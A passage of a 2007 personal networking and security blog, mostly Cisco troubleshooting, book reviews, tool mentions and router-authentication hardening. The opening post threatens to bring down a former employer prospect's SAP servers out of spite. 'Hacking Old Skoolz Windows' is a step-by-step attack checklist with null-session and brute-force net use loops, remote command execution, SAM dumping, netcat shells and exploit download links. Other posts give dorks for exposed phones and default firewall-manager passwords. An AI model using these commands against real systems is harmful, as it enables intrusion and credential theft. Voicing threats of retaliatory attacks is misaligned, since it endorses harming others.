I always wanted to work for SAP because they pay huge money. I remembered i was being interviewed by SAP back in Singapore. During the first interview, it took me at least 1-2 hours of conversation and i passed the interview. The HR invited me for a second interview, however this time, the interviewer is crap. He asked all sorts of questions and i succintly answered them without beating around the bush. Its either he didnt get what i am trying to say or he is just plain talkative. I entrench strong to my roots for what i said and he did not believe me and saying that i am a pefect candidate for the position and looks like what they are searching for. ALL BLOODY CRAP!!!! A bunch of liars. They truly antagonize me and i loathe them for that. I am a straight person, if you don't wish to hire me, thats fine, just tell me straight and i will understand. Don't have to setup a bunch of stories and be a coward.

Well, good luck to you SAP. If i have a chance to audit your system, i promise i will bring down all your SAP/R3 servers and other external servers you have. Better protect your RFC or you will be OWNED!

The Hacka Man

Cisco show mem vs show processes memory sorted

2007-06-27T12:05:00.000+08:00

For me to check the router or firewall cpu usage and the memory usage, i always issue the show mem or show processes cpu to see what is causing the router to have a high CPU or memomry utilization. However, i realised that the show mem command output is not as nice as it seemed to be. I was looking at ioshints blog and found out the same command with a little tweaks here and there. This command provides a better output than show mem which is very important for troubleshooting purposes. See below:

show processes memory sorted

show processes cpu sorted 1min

show processes cpu sorted 7min

From cisco:

http://www.cisco.com/warp/public/63/showproc_cpu.html

http://www.cisco.com/warp/public/63/highcpu.html

For Cisco and Juniper command:

http://networking.ringofsaturn.com/Cisco/ciscojuniper.php

Designing and Implementing Linux Firewalls with QoS using netfilter, iproute2, NAT and l7-filter

2007-06-26T17:03:00.000+08:00

I was invited by Lucian to review this book. Lucian actually sent me a copy of this book for me to read and i was happy upon receiving it. Well, i am someone who loves firewall and security stuff especially linux and cisco. This book is absolutely amazing. For beginners, there are a lot of technical configuration you can read and learn and for experts, this book will guide you to some topic that might interest you. I would really want to put this book into practice, but however base on my current situation, i will only have the time to read and understand the concept. I would highly rate this book a 4.5/5 and anyone who wants to learn firewall at a low level.

VoIPong installation error

2007-06-26T13:42:00.000+08:00

For those of you who try to install VoIPong and have installation errors like the ones below, the problem and solution are provided as shown below:

Murat Balaban writes:

>
> Hi Henrique,
>
> Which UNIX user is trying to run voipong? It seems a non-root
> user is running it, but does not have the sufficient privileges
> to open the ethernet device in promisc mode.
>
> Plus, you seem to have problems with the permissions of
> your modules directory. That directory should be owned by
> the same user running voipong.
>
> Thursday, May 31, 2007, 8:41:56 PM, you wrote:
>
> > Release 2.0, running on DINP70759 [Linux 2.4.25-klg #1
> > SMP Ter Abr 6 09:28:24 BRT 2004 i686]
>
> > (c) Murat Balaban http://www.enderunix.org/
> > 31/05/07 14:34:14: EnderUNIX VOIPONG Voice Over IP
> > Sniffer starting...
> > 31/05/07 14:34:14: Release 2.0 running on DINP70759
> > [Linux 2.4.25-klg #1 SMP Ter Abr 6 09:28:24 BRT 2004
> > i686]. (c) Murat Balaban http://www.enderunix.org/
> > [pid: 669]
> > 31/05/07 14:34:14: Default matching algorithm: lfp
> > 31/05/07 14:34:14: error:
> > securemod(/usr/local/etc/voipong/modules/modvocoder_pcma.so):
> > gid: got 50, expected 0
> > 31/05/07 14:34:14: error:
> > securemod(/usr/local/etc/voipong/modules/modvocoder_pcmu.so):
> > gid: got 50, expected 0
> > 31/05/07 14:34:14: loaded 0 module(s)
> > 31/05/07 14:34:14: libpcap start failure:
> > pcap_open_live: SIOCGIFHWADDR: No such device
>
> > 31/05/07 14:34:14: PID 669 [parent: 653]: exited with
> > code: 1. uptime: .
>
I had the same problems and i had solved it using this command
sudo chown -R root:root /usr/local/etc/voipong/modules/modvocoder_pcm*
Also for the voipongnets, i created the file by
touch /usr/local/etc/voipong/voipongnets
This will solve the error below.

Snom phones web interface exposed to public.

2007-06-25T15:59:00.000+08:00

I was just researching on hard and soft phones and i came across Snom VoIP phones. I don't know much about the phones, however a simple google dorking gave me a bad result. Default installations of the phone is not password protected. Check it out:

"(e.g. 0114930398330)" snom

Hakin9 X Hackathology

2007-06-24T12:15:00.000+08:00

This past week, i was invited by hakin9 magazine to write an article about the lastest hacking skills. I am still thinking about a topic to write. There are different types of hacks and i am in a dilemma in choosing one. After pondering for sometime, i think i would love to write hacks about VoIP. Personally, because VoIP is a subset of network security, i think its best to write something that i am good at. I had already setup a PBX server and now its up to the guys at hakin9. The hakin9 team is a bunch of really cool and nice guys. They gave me a free copy of their magazine and once my article is published, they will also send me a copy of the published issue. I will keep you guys updated on this. Let me know what you guys think?

David Litchfield new Oracle book

2007-06-22T12:42:00.000+08:00

I had been wanting to learn more about Oracle hacking and i would not say i am not really good in Oracle Security. I managed to setup a Oracle Database server and do some simple exploitation and auditing, however i know that for me to be good in that aspect, it would require to focus most of my time trying to exploit and learn the techniques to hacking the database. This past week, it had came to my attention that David Litchfield(Oracle Security Guru, google him up to find out more) had published a book called Oracle Hacker's Handbook. I highly recommend anyone who loves Oracle Security to purchase this book. Although i had not lay my hands on this book, it will soon be on my bookshelves.

Using ftp with CUTCP telnet

2007-06-18T13:42:00.000+08:00

Check out CUTCP

"Telnet is a program used to interactively log in to a remote computer. CUTCP telnet is a program that runs on a PC and is used in CIRCA labs and elsewhere on campus to log in to remote computers. This program can also function as an ftp server when you are logged in to a remote host. This means that you can use the host's ftp client to connect back to yourself. Here's how you do it:

1) First use telnet to log in to the remote host.

2) Press Alt/T. This will generate an ftp command with the proper network address and start the ftp client program on the interactive host.

3) When it asks for a name, enter anything.

4) When it asks for a password, press Alt/W. This will provide a hidden password to authenticate the connection.

Remember that when you have completed this connection, your PC is an ftp server, and the interactive host is running an ftp client. To transfer a file from the interactive host to your PC, use the put command. To transfer a file from the PC to the interactive host, use the get command."

Regular Expressions with Cisco IOS

2007-06-17T20:24:00.000+08:00

I was reaading some cisco stuffs today and i knew long ago that Cisco IOS allows regular expression for simplification of search task and other uses. Well, back then i did not research much on it but i just came across 2 sites which provides more explaination with regards to Cisco IOS regex.

http://www.cisco.com/univercd/cc/td/doc/product/software/ios122/122cgcr/ftersv_c/ftsappx/tcfaapre.htm

http://www.nil.com/ipcorner/EnhanceIOSUI/

Cisco Router's DNS server to kill browser advertisement

2007-06-16T17:17:00.000+08:00

I just happen to stumble across ioshints blog. He mentioned something about the cisco router's dns server having a way to prevent unwanted website advertisement. You guys can read more at: http://www.nil.com/ipcorner/RouterDNS/

Hacking Old Skoolz Windows

2007-06-16T15:11:00.001+08:00

Port 135 (client-server communications)

Port 139, 445 (authentication and file sharing)

Port 137,138 (NetBIOS browser, name and lookup functions)

Look for port 135 endpoint mapping which includes, Microsoft Outlook, Exchange and Messenger Service.

Nmap server to look for port 135

Run rpcscan or epdump on server over port tcp or udp port 135

If udp port 1028, 1029 opened or tcp port 1025 opened, run rpcscan over those ports

Look for IFID 12345778-1234-abcd-ef00-0123456789ab and 12345778-1234-abcd-ef00-0123456789ac for both LSA and SAMR interface respectively. Can be found on all Windows NT OS using name pipes accessible through SMB session over TCP port 139 or 445.

Run walksam query if SMAR interface is present to glean user information.

Run rpcclient from backtrack if a valid username and password is given. LSARPC interface must be present

Compromise admin password using brute force tool WMICracker.

Use Remoxec to execute arbitrary commands.

Verify if server is vulnerable for RPC DCOM exploits. If patch MS03-026 and MS03-039 is applied, nothing can be done. Else download exploits from

http://packetstormsecurity.org/0307-exploits/dcom.c
http://packetstormsecurity.org/0307-exploits/DComExpl_UnixWin32.zip
http://packetstormsecurity.org/0307-exploits/rpcdcom.101.zip
http://packetstormsecurity.org/0307-exploits/oc192-dcom.c
http://examples.oreilly.com/networksa/tools/dcom-exploits.zip
http://www.securityfocus.com/bid/8205/exploit/

DCOM interface can be exploited through:

TCP and UDP port 135 (through RPC server service)
TCP ports 139 and 445 (through SMB and named pipes)
TCP port 593 (through COM Internet Services, if installed)
Use kaHt2 to exploit a remote shell
Use SPKIE msrpcfuzz fuzzer to do stress test.

-----------------------------------------------------------------------------------------

NetBIOS Name Service UDP port 137

Dumping NetBIOS table: Nbtstat –A 192.168.1.152

Local Area Connection:
Node IpAddress: [192.168.1.20] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
CARAA <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
CARAA <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered

MAC Address = 00-0D-88-CB-30-0B

------------------------------------------------

<00> unique hostname
<00> group domain name
<03> unique Messenger service running for that computer
<03> unique Messenger service running for that individual logged in user
<20> unique Server service running
<1D> group Master browser name for the subnet
<1B> unique Domain master browser name, identifies PDC for that domain
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0661

NetBIOS Datagram Service UDP port 138
http://www.securityfocus.com/advisories/2556

NetBIOS Session Service TCP port 139

Connect through null session:

net use \\192.168.1.152\IPC$ “” /user:””
net view \\192.168.1.152
Use tools like enum, GetAcct and winfo to enumerate more info.

Brute force user password through NetBIOS session service with tools like SMBCrack and SMB-AT or use Windows LOOP to find password.

1. Create a file credentials.txt with username and password:

Password Username
“” Administrator
Password Administrator
Admin Administrator

2. FOR /F “tokens=1,2*” %i in (credentials.txt) do net use \\192.168.1.152\IPC$ %i /user:%j

3. Using the NetBIOS tool with LOOP
FOR /L %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt 192.168.1.%i > out.txt

Connect through valid user:
Smbclient to enumerate more info.
net use \\192.168.1.152\C$ * /user:scadmin (Will prompt for a password)
net use \\192.168.1.152\C$ ronald3211 /user:scadmin
at \\192.168.1.152 00:04 c:\Windows\system32\cmd.exe

Modify and accessing registry keys using
Regdmp.exe
Regini.exe
Reg.exe

Accessing the SAM Database and LSASS

Pwdump5
Lsadump2

CIFS Service running on TCP and UDP port 445

SMB-AT to enumerate user and system info.
Smbserverscan to scan for smb related ports.
Smbgetserverinfo to get server info.
smbNAT to provide more details about the server info.

Smbdumpusers to enumerate port 139 and 445.
Smbdumpusers –i 192.168.1.152 –m 2 –P1

Smbbf to brute-force password grinding attacks against both NetBIOS and CIFS services.
Smbbf –i 192.168.1.152 –p wordlist.txt –u users.txt –v –P1

Need to have admin user name and password.
Samrdump to list all username in server
Rpcdump to list all endpoint bindings

Registry path for null session: HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Restrictanonymous =0, 1, 2

Use pwdump5 to capture SAM file.
Use netcat to open a shell on remote OS
Use psexec through port 139 or 445 to execute command
Psexec \\192.168.1.152 –u Admin –p password –s cmd.exe

IIS buffer overflow

IIS 5.0 SSL Remote root exploit use thciisslame

Cisco's PIX/ASA TCP flags syntax

2007-06-13T15:55:00.000+08:00

Have you guys ever wondered how PIX or ASA firewall TCP 3 way handshake works? Well, its absolutely similiar to how the normal TCP/IP handshake works. Just a little different in terms of the syntax. For instance SYN flag in PIX is known as saA. For torubleshooting purposes, you would however need to know these flags in PIX/ASA. I had summarised a table of the flags and how it works.

PIX firewall troubleshooting commands

2007-06-12T13:44:00.000+08:00

I am adding some commonly used PIX firewall troubleshooting commands. For those of you who does troubleshooting of the firewall, you know should familiar yourself with these commmands. Handy yet Powerful.

1. show xlate, show xlate detail - display NAT translations and its details

2. show connection, show connection detail - display connection details built in the firewall

3. show service-policy - display inspection policies

4. show local-host 192.168.1.1 - display translation, AAA, connection information

5. show asp drop - show number of packets dropped while processing the packets

6. show mem - display memory usage in the PIX

7. show cpu usage - display cpu usage over a time period

8. show traffic - display total traffic transmitted and received on each individual interfaces on the PIX

9. show block and show cpu usage can determine if the firewall is overloaded.

Of course there are many other things you would need to know like the debug commands, capture commands, show logging, show running logging, show logging setting commands. If you guys need to know more, just email me and i will guide you

Page Rank at 4

2007-05-18T17:02:00.000+08:00

Hi guys, its been really a long time since i update my blog. These days, i am just pure pure busy with ideas flowing around and trying to make my ideas happen. I am actually doing lotsa research and reading work and putting bits and pieces together once it is ready. I should be starting to code when i make a return trip back to dubai from singapore. Well, i was searching for page ranking of my blog, and to my surprise, just 2 months of blogging and commenting, i got a page rank of 4 which i am so happy. Its like i start from 0 to 4, and now, thats an achivement for me. Check out www.seochat.com. This hardwork and perseverance will be continued on my new project and i hope to make it a success. Till then, drop me an email if you guys want to know more about networking or just say hi and I will be happy. Peace.

My Last Post on Security Stuffs

2007-04-21T15:54:00.000+08:00

To all my dereast and loyal readers, i am sad to say that this might be the last post i make regarding network security or web security here. Why? Because i am off to something even more exciting and challenging. These 2 months of blogging had been really great with a vast amount of knowledge exchanged from the community. Its a short yet fruitful journey for me and thank you guys for all the support and emails you gave me. I can only say sorry here because i will not have the time to actually blog too much on security again. Instead something big and exciting is waiting ahead for me to accomplished. Nevertheless, you guys can still email me regarding security issues you have. I will try to response fast. Once again, thank you.

Windows Vista Forensics

2007-04-18T15:24:00.000+08:00

I was reading articles and i happen to stumble a microsoft vista forensics article. In this article, Jamie Morris from Forensic Focus share his view on vista forensics and several new vista features. I think microsoft is really picking up on security these days compared to the past and their response to security incident is fast. Yes, you can agrue that vista is hacked and it is not secure, but still which softwre doesnt have bugs? Most importantly, they always release patches fast after certain exploits has been discovered and allowing end users like us to do update. Linux is powerful and has improved a lot over the years, but still i would prefer to use microsoft as my main OS and Linux as a VMWare image, why? Because i think Bill Gates is great. I give full support to this man 100%. Without Bill, you wont have a great OS like Windows for you to start your computer knowledge with. Well, this is just my point of view, but you can argue.

Tactical VoIP Toolkit Released

2007-04-17T18:39:00.000+08:00

Guys, if you are into VoIP auditing, the Grugq has finally released his long waited Tactical VoIP Toolkit. I was using this tool at HiTB when he first released it to the students attending his training. It was written in Python and best of all, it is customizable. You can write your own VoIP security tools on top of the Toolkit. This makes it very portable and flexible in terms of the tool's function. Well, currently there is only siping and ravage but its sufficient enough to perform basic audit and analyzation.

"The Tactical VoIP Toolkit (TacVTK) is a collection of tools designed specifically for VoIP security assessment. The TacVTK's functionality will expand in as new tools are developed and integrated."

Please visit the Grugq's site at http://www.tacticalvoip.com to download this free and powerful tool. Hey Grugq, big ups to you. :)

Wapiti and proxmon

2007-04-16T18:39:00.000+08:00

I was posting on Rsnake's forum about web penetration testing tools that most web application pentesters used. For me, i only use webscarab, XSS cheatsheet from Rsnake, wikto and firefox addons like tamper data and live http headers for my testings. These tools are good enough for me to get the job done most of the time. Sometimes, it depends how much i want to actually break into systems during a test. If the application has a lot of vulnerabilities during a simple scan, it is nuff said, please patch your system. Else if the application is robust enough, i am very determine to actually dig in further to uncover flaws.

The other night, jeremiah posted a topic on "Vulnerability Assessment, When do we stop looking? " and i commented that if the application is vulnerable to simple scans, then it is not worth to dig in further, else if the application is robust, it is worth every single effort to explore more flaws. And when do we stop? It all depends on how much you think the application has serious vulnerabilities. As i was commenting on his blog, i was thinking of a tool that can simplify my process of auditing and i happen to read on jungsonn comments. He recommended a very useful tool that i am going to test it once i finished my project over here. Yes its hectic here and sorry for the lack of updates guys. Here is a short excerpt.

Wapiti:
* File Handling Errors (Local and remote include/require, fopen, readfile…)
* Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
* XSS (Cross Site Scripting) Injection
* LDAP Injection
* Command Execution detection (eval(), system(), passtru()…)
* CRLF Injection (HTTP Response Splitting, session fixation…)

I managed to test it a little and it seems to be a good tool to use and the best of all, its open source which means it is free!! You will need python to use this tool. More can be found here: http://wapiti.sourceforge.net

As i was playing around his tool, i was thinking about blackhat. I want to see what is the latest exploits that security researchers found and i stumble across another web application pentesting tool. Its proxmon. It was written by Jonathan Wilkins and he presented in Blackhat Europe 2007, so i guess it wouldn't be a bad tool to use. A sample of the tool output is shown as below:

[*] starting ProxMon v1.0.15 (http://www.isecpartners.com)
[*] Copyright (C) 2007, Jonathan Wilkins, iSEC Partners Inc.
[*] Proxmon comes with ABSOLUTELY NO WARRANTY;
[*] This is free software, and you are welcome to redistribute it
[*] under certain conditions; see accompanying file LICENSE for
[*] details on warranty and redistribution details.
[*] Loading support for: WebScarab
[*] Loading Checks ...
- Find interesting comments
- Find cookie values that also are sent on the query string
- Find HTTP Basic or Digest Authentication usage
- Identify frameworks and scripts in use by server
- Find dangerous functions in JavaScript code
- Find offsite redirects
- Find cookies with the secure flag that also get sent cleartext
- Find values set over SSL that later go cleartext
- Find values sent to other domains
- Find common undesirable directories
- Find files that indicate common vulnerabilities
- Find directories that allow directory listing
- Find SSL server configuration issues
- Find directories writable via PUT
[*] 14 checks loaded
[*] Finding available sessions ...
[*] Processing session test/webscarab in test
[*] Running in monitor mode
[*] Monitoring test/webscarab
[*] Parsing existing conversations ...
[*] Interesting comment: XXX in http://scratch.bitland.net:80/ (TIDs: 35)
[*] Interesting comment: bug in http://www.bitland.net:80/ (TIDs: 532)
[*] Interesting comment: TODO in http://scratch.bitland.net:80/ (TIDs: 35)
[*] Interesting comment: ??? in http://scratch.bitland.net:80/ (TIDs: 35)
[*] Interesting comment: !!! in http://scratch.bitland.net:80/ (TIDs: 35)
[*] Cookie value seen on QS: secret1 (Secure, SSL) (TIDs: 16)
[*] Cookie value seen on QS: secret2 (Secure, SSL) (TIDs: 9)
[*] Digest auth seen: Authorization: Digest username='jwilkins', realm='scratchdigest', [snip ...] (TIDs: 34)
[*] Basic auth seen: Authorization: Basic andpbGtpbnM6YXNkZmFzZGY= (TIDs: 31, 32)
[*] IDed framework: scratch.bitland.net:80 is using PHP/5.2.1 (http://www.php.net) (TIDs: 35)
[*] IDed framework: www.isecpartners.com:80 is using YUI/1.2.3 (http://developer.yahoo.com/yui) (TIDs: 16)
[*] Unsafe JavaScript found: eval at http://scratch.bitland.net:80/:15 (TIDs: 35)
[*] Unsafe JavaScript found: eval at http://scratch.bitland.net:80/:16 (TIDs: 35)
[*] Secure cookie value sent clear: secret2 (TIDs: 7, 9)
[*] Secure cookie value sent clear: secret1 (TIDs: 16, 36)
[*] Value set over SSL sent clear: secret2 as secure2 (TIDs: 7)
[*] Value set over SSL sent clear: secret2 as bar (TIDs: 9)
[*] Value set over SSL sent clear: secret1 as foobar (TIDs: 16)
[*] Value set over SSL sent clear: secret1 as asdf (TIDs: 36)
[*] Value (secret1) sent to multiple domains: bitland.net (TIDs: 5, 6, 36)
[*] Value (secret1) sent to multiple domains: isecpartners.com (TIDs: 16)
[*] Bad directory found: /backup/ on scratch.bitland.net:80 (TIDs: 0)
[*] Bad file found: /environ.pl on scratch.bitland.net:80 (TIDs: 0)
[*] Listing of /listable/ on scratch.bitland.net:80 succeeded (TIDs: 0)
[*] SSL Config issue https://www.bitland.net:443: aNULL null cipher (TIDs: 0)
[*] SSL Config issue https://www.bitland.net:443: Export strength ciphers (TIDs: 0)
[*] SSL Config issue https://www.bitland.net:443: 40 bit Export strength ciphers (TIDs: 0)
[*] SSL Config issue https://www.bitland.net:443: Low strength ciphers (TIDs: 0)
[*] SSL Config issue https://www.bitland.net:443: SSLv2 protocol (TIDs: 0)
[*] Upload to /put/ on scratch.bitland.net:80 succeeded (TIDs: 0)
[*] Parsed 38 existing conversations
[*] Session is not active, no point in monitoring

Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM Vulnerability

2007-04-15T16:08:00.001+08:00

"Cisco Catalyst 6000, 6500 series and Cisco 7600 series that have a Network Analysis Module installed are vulnerable to an attack, which could allow an attacker to gain complete control of the system. Only Cisco Catalyst systems that have a NAM on them are affected. This vulnerability affects systems that run Internetwork Operating System(IOS) or Catalyst Operating System (CatOS)."

More information can be found here:
http://www.cisco.com/warp/public/707/cisco-sa-20070228-nam.shtml

"NAMs communicate with the Catalyst system by using the Simple Network Management Protocol (SNMP). By spoofing the SNMP communication between the Catalyst system and the NAM an attacker may obtain complete control of the Catalyst system."

Cisco PIX PFM plaintext password revealed

2007-04-13T20:07:00.000+08:00

For those who are using PIX Firewall Manager to configure and manage your firewall, you are at risk of your firewall password being obtained by an intruder or an insider. Why? Because after the PFM software makes an initial connection to the PIX Firewall, the administrative password is stored in plaintext on the local management workstation. I am not too where is it stored, but it might be in the registry or search for the PFM installation directory for log or text files. It might be inside. So, to avoid that, cisco recommends using PIX Device Manager(PDM) instead. Well, for me, i never use PDM or PFM to configure the firewall, the IOS itself is good enough for me. Also, always practice logging your PC after finished using. The default username and password for the PFM is as shown below:

Administrator username: pixadmin
Administrator password: cisco

Normal user username: pixuser
Normal user password: cisco

Change your default user accounts to avoid compromisation.

NACAttack BlackHat Europe 2007

2007-04-12T21:51:00.000+08:00

Last night i blogged about the possible of NAC attack. Today, i found out that this had already been presented. Ok, i know i am slow catching up but both the german researchers managed to spoof the posture validation between a Cisco Trust Agent to the Cisco ACS (Access Control Server), and to gain access to the network even if the element is not compliant with the posture validation checks. To download the presentation and whitepapers, go to: http://www.blackhat.com/html/bh-media-archives/bh-archives-2007.html#eu

Hacking Cisco NAC - NACATTACK

2007-04-11T19:04:00.000+08:00

Dror-John Roecher and Michael Thumann who were able to hack the Cisco NAC solution by exploiting a fundamental design flaw. In this video they illustrate how they worked towards this discovery and give us some exploit details. It is not their intention to simply release a tool, they want the audience to understand how Cisco NAC works and why it is not as secure as Cisco wants us to believe.

Defeating Evil Twin

2007-04-10T17:38:00.000+08:00

The other day i was discussing with thrill about detecting and defeating Evil Twin and what are the best options beside using WEP or WPA. For folks who still don't know, both WEP and WPA can be broken and is not considered secure. Check my previous post and you will find the tools needed to break those keys. Apparently, it boils down to two options, but i will let you guys decide which one is more secure.

Thrill was suggesting about placing an Access Point in the DMZ area and make the IP a private one. A VPN server would also be needed to be setup in the DMZ area for listening to clients who wants to connect to the AP and use the wireless service. In that manner, an attacker who tries to setup an Evil Twin will not have access to the DMZ area because he would first need to use a VPN client to connect to the VPN server before any surfing can continue. This has several advantages and disadvantages and it all depends how you looked at it. The advantages being that all the traffic will be encrypted because it will be tunneled through a VPN server first before going out to the internet. Second being that SSID can be broadcast and no WEP/WPA security is needed. Of course if you are being paranoid, you can also include WPA key as an option. And third, it will defeat most Evil Twin. Below is a diagram which depicts the whole scenario.

According to thrill, its not necessary to implement a DMZ zone. It could be another extra network card on the VPN server that is going to have itself and the AP connected to it. Thrill quoted: "The trick is to not allow routing through this interface, and to set up a VPN server on that machine listening ONLY on that interface. And maybe a DHCP server on that interface as well. This is how this network becomes secure, and someone setting up an Evil Twin wouldn't be able to duplicate. And even if they did, the VPN client can be set up to authenticate a server side certificate easy enough." I wont say this is 100% secure, but it is the best solution he can think of and i do agree that it is good solution. The downside of this setup is every user needs to install OpenVPN client software on their machine and needs to be notified of the setup. That's a hassle.

On the other side, thrill also quote: "using 802.1x authentication along with using a Radius server for logging in the user. Some of you may have already heard of the technology, it's using the Odyssey client by Funk Software, along with their Steel Belted Radius. Using Cisco APs we were able to enable rotating WEP keys that were only given to the client if their Certificate could be authenticated, once they were connected to the wireless network, they then needed to authenticate their user/password via the radius which pointed to the LDAP portion of AD. The trick for rotating SSID/WEP keys is using a certificate to authenticate to the actual AP. The AP is set up to point to a radius server which has the certificate on it, then the client sends the AP the supplication requesting the SSID/Key, the AP forwards the request to the Radius server which authenticates the certificate and sends an OK to the AP, who in turn sends the client the SSID/Key to authenticate." Below depicts the scenarion:

Whichever is better, if something becomes too hard to use or requires too many steps, most people will be lazy and don't care about it. But then again, it all depends on the organization on how they want to implement their systems. Just my opinion.

Rsnake and Jeremiah new XSS book

2007-04-09T16:03:00.000+08:00

Ok guys, i need to show some love for my man Rsnake and Jeremiah. They are releasing a new book call Cross Site Scripting Attacks: Xss Exploits and Defense and of course, i am all out to go get it. This is definitely one not to be missed. Get it while its hot.

Becoming an Ethical hacker.

2007-04-09T15:37:00.000+08:00

For those of you who wished to be a hacker, you will need some small little tricks here and there and of course, a great deal of knowledge will help. There is a pdf out on the internet which actually shows you how you can become a hacker. Some of you might have actually got it, but well, for those who wants to become a hacker and wants to know the jack of all trades in hacking, do a simple google dorking with:

filetype:pdf "Becoming a Hacker – Part 1"

Download the pdf and there you learn hacking. Let me know what you guys think?

Disclaimer: Please do not use this document that you downloaded to perform any illegal activities. I will not hold any responsibility on this matter.

Verifying authencation mechanism used in routing protocls

2007-04-08T18:06:00.000+08:00

Way back in my previous post, i had given a list of audting commands to follow when performing auditing of Cisco routers. Now its time to verify if the protocols themselves are using authentication mechanism to defeat most of the attacks. Most of the time after a penetration test, if you find telnet port open, you would suggest the client to use SSH instead of telnet. This is ok, because it is easy to migrate the protocols. What if SNMP port is open? Do you tell the client to disable it because it is vulnerable to attacks or would you suggest the client to upgrade to the lastest version? What about compatibility and interoperability issues between SNMPv2 and SNMPv3? What if the client needs this protocol for monitoring purposes? Well, I guess there is always solution to everything. I will show you steps where you can perform to ensure that the "vulnerable" protocol is at least safe from 70% of the attacks.

SNMP: Make sure access-list is used to limit machines that is allowed to access to router. For example, see the following commands:

Setting the access-list to permit only IPs that are allowed to access the router.

access−list 12 permit 192.168.1.1
access−list 13 permit 192.168.1.2

The command below sets the community string which is sort like a password to access-list 28 and 29. Of course, you should set a very strong community to avoid brute-force or dictionary attacks.

snmp−server community cisco1 RW 28
snmp−server community cisco2 RO 29

The command below allow the router to send traps to the SNMP Manager machine

snmp−server host 192.168.1.1 cisco1 snmp
snmp−server host 192.168.1.2 cisco2 snmp

So by using the access-list command, only the allowed hosts are able to perform the necessary tasks.

RIP: RIPv1 does not support any authentication, instead it is using plain text for routing purposes. However, RIPv2 support both plain text and md5 authentication. When auditing an IOS config file, check for the following key words:

key chain cisco
key 1
key−string rip

ip rip authentication key−chain cisco
ip rip authentication mode md5

To allow routing protocol authentication, the key chain command will identify a group of authentication keys, the key command will identify an authentication key on a key chain and the key-string command will specify the authentication string for a key. On top of it, make sure that the command ip rip authentication mode md5 is enabled for RIP updates.

EIGRP: The same goes for EIGRP. The commands to check for EIGRP is identical to RIP as shown below:

key chain cisco
key 1
key−string eigrp

ip authentication mode eigrp 10 md5
ip authentication key−chain eigrp 10 cisco

Please note that the command ip authentication mode eigrp 10 md5 is different from RIP's ip authentication mode md5. The "eigrp 10" is intepreted as eigrp , so please take note of that.

OSPF: OSPF supports both plain text and md5 authentication. You can choose either one of the authentication method depending on your preference. Some routers might not support the md5 authentication, so that leaves you with no choice but to use plain text authention. Else, deploy md5 authentication which is 100 times more secure. Check for these commands below to see if the router is using any authentication.

For plain text authentication:
ip ospf authentication−key cisco
area 0 authentication

For md5 authentication:
ip ospf message−digest−key 40 md5 cisco
area 0 authentication message−digest
Please note that the value of the key-id which is 40 allows passwords to be changed without having to disable authentication.

So above is a quick list to check for authentication on routing protocols. If you happen to have a chance to audit a router config file, just a glance will tell you how good is the network administrator is.

To know more about the commands usage and its meaning, refer to http://cco.cisco.com/en/US/products/sw/iosswrel/ps5187/products_command_reference_chapter09186a008017d029.html

Cisco IOS CLI regular expressions, Part II — ‘AND’

2007-04-07T21:47:00.000+08:00

Handsomeplanet wrote about using regex in IOS which is a good idea to see it live.

Here’s a scenario: you’re auditing one of your routers, checking to make sure privilege levels are what they should be for individual users, and that commands that have been moved into non-default privilege levels that appear to be correctly defined.

Here’s the output of ’show running-config’ with only lines that match ‘privi’ included (so as to catch lines that show privilege levels:

IOS-rtr#sh run | inc privi
username sneezy privilege 0 secret 5 $1$Dz6cKoEINsYusITt.l
username dopey privilege 0 secret 5 $1$MIUYWJ.I3iGq/qNleB.
username meson privilege 0 secret 5 $1$7uBWyjan.5JB8KHR0
username gluon privilege 15 secret 5 $1$VuoC$09dsgXRB.A/d
privilege exec level 0 traceroute
privilege exec level 0 ping
privilege exec all level 0 show
privilege exec level 0 clear ip nat translation
privilege exec level 0 clear ip nat
privilege exec level 0 clear ip
privilege exec level 0 clear
privilege configure level 7 logging
privilege configure level 7 logging trap
privilege configure level 7 logging source
privilege level 15
privilege level 15

In this case, you can use the regular expression “.*” (dot-star) to match lines that contain both the word ‘privilege’ and ‘level 0′, thus eliminating other priv levels, as well as username definitions:
IOS-rtr#sh run | inc privi.*level 0
privilege exec level 0 traceroute
privilege exec level 0 ping
privilege exec all level 0 show
privilege exec level 0 clear ip nat translation
privilege exec level 0 clear ip nat
privilege exec level 0 clear ip
privilege exec level 0 clear

The same thing works for an audit of ‘level 7′ commands:

OS-rtr#sh run | inc privi.*level 7
privilege configure level 7 logging
privilege configure level 7 logging trap
privilege configure level 7 logging source

If you want to show lines that match privilege levels other than zero, you could use this:
IOS-rtr#sh run | inc priv.*[1-9]

You should note that the “.*” (dot-star) regular expression can be used as a synonym for AND, provided that you are aware that “.*” is not order agnostic.
In order to do a true AND, you’d need an expression like :
sh run | inc (privi.*level 0|level 0.*privi)
This will match lines containing both ‘privilege’ and ‘level 0′, no matter which of the words appears first. To illustrate this, I’ll create a loopback interface (loop3) with some description text that will match the regex:

IOS-rtr#conf t
Enter configuration commands, one per line. End with CNTL/Z.
IOS-rtr(config)#int loop3
IOS-rtr(config-if)#desc level 0 is not privileged here!
IOS-rtr(config-if)#^Z
IOS-rtr#sh run | inc (privi.*level 0|level 0.*privi)
description level 0 is not privileged here!
privilege exec level 0 traceroute
privilege exec level 0 ping
privilege exec all level 0 show
privilege exec level 0 clear ip nat translation
privilege exec level 0 clear ip nat
privilege exec level 0 clear ip
privilege exec level 0 clear

It works! Notice that we caught both the description line and the privilege exec lines.

I guess I’m easily excited, but there it is. Next time I write about regular expressions for IOS, I’ll cover a kooky but somewhat useful use of ‘exclude’ that will get you just what you need from a list of dynamic switch MAC addresses.

Frame-Relay explained

2007-04-07T21:37:00.000+08:00

The other night i showed some frame-relay sample configuration and today i am going to blog more about frame-relay networks. Frame-relay is a reliable and inexpensive WAN protocol whereby it provides QoS service using DE bit, FECN and BECN bit. It also save cost for company who used to deploy leased-lines in the past by creating Permanent Virtual Circuit(PVC) with physical access lines. Before going further, below are some terms used the in Frame-relay terminology. I will not write a full article on frame-relay because the whole concept is so huge. I will just briefly describe how it works and its usage.

CIR Committed Information Rate [Guaranteed rate at which the network commits to transfer user data under normal conditions]
EIR Excess Information Rate [Maximum rate capactiy on top of CIR]
DLCI Data Link Connection Identifier [PVC end point connection identifier with only local significance]
LMI Local Management Interface [Maintenance protocol for frame-relay]

